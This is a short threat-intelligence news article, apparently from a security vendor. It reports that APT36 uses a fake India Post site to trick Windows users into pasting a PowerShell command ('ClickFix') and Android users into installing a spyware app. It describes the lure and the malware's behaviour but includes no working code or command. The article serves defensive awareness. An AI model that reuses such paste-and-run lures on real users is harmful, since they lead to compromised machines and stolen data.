HQ/EMEAFind out how we can help your business
APT36, an advanced persistent threat group linked with Pakistan, has allegedly created a fake India Post website to infect Windows and Android Indian users.
Researchers attribute the newly discovered campaign to the APT group, also known as Transparent Tribe. The bogus website impersonating India Post is called “postindia[.]site.”
Users who visit the malicious site from Windows will be instructed to download a PDF document, while those who visit from an Android device will be redirected to a hostile app package.
Moreover, when accessed on a desktop, the site provides a malicious PDF file with ‘ClickFix’ tactics. A prompt directs users to hit the Win + R keys, paste a supplied PowerShell command into the Run prompt, and then run it, potentially compromising the machine.
The fake India Post website was registered in November last year.
Investigations show that the domain mimicking India Post was registered around November 20, 2024. A PowerShell function will then download a next-stage payload from an inactive remote server.
When the same site is visited from an Android device, it prompts users to install their mobile app for a “better experience.” Once installed, the app requests risky permissions, allowing it to harvest and exfiltrate sensitive data such as contact lists, current locations, and files from external storage.
In addition, the Android application modifies its icon to resemble a non-suspicious Google Accounts symbol to conceal its activities, making it harder for the user to discover and uninstall the software when necessary. The software also features a function that forces users to accept permissions if denied the first time.
The malicious program is also designed to execute in the background indefinitely, even after a device restart, while explicitly requesting permission to bypass battery optimisation.
Hackers, scammers, and APT organisations are increasingly exploiting the new ClickFix tactic as researchers continue to observe a surge of such activities in the threat landscape.
This developing strategy is a massive concern because it can target both naive and tech-savvy individuals unfamiliar and not updated with the new malicious tactic.
